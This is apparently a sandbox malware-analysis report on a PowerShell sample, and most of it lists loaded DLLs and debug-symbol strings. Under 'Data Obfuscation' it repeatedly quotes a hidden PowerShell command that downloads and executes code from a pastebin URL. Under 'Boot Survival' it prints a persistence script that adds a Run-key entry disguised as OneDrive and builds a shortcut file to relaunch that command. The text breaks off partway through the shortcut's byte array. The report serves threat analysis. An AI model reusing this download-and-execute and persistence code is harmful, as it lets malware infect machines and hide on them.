Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync.lnk.0.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: softy.pdbll source: powershell.exe, 00000008.00000002.1906330192.000001D636E11000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE949000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE9A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE9A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000008.00000002.1866332209.000001D61CD98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb! source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb3 source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE949000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb[n source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE9A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE9A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE9C2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb9 source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb! source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb/ source: powershell.exe, 00000008.00000002.1906732585.000001D636E51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE949000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1999497384.000001F8DE6BE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000008.00000002.1906732585.000001D636E51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000C.00000002.2002415308.000001F8DEA07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbs0 source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.2001836314.000001F8DE8B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE949000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb} source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE949000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbo source: powershell.exe, 00000008.00000002.1909922743.000001D6370F8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000008.00000002.1907933028.000001D63709A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2002415308.000001F8DE949000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbj source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE9C2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb3 source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb4p source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdberShell.Commands.Utility.pdb source: powershell.exe, 00000008.00000002.1909922743.000001D6370F8000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4AB0276B push ss; iretd 0_2_00007FFB4AB0277A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4ABD6AEE push ebp; iretd 0_2_00007FFB4ABD6DC8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4AAD5948 push eax; iretd 8_2_00007FFB4AAD595A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4AAD00BD pushad ; iretd 8_2_00007FFB4AAD00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4AAD3F7A push cs; iretd 8_2_00007FFB4AAD405A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4ABA6DC3 push edi; iretd 8_2_00007FFB4ABA6DC6

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $currentPath + ";$env:tmp"[System.Environment]::SetEnvironmentVariable("PATH", $newPath, "User")New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,
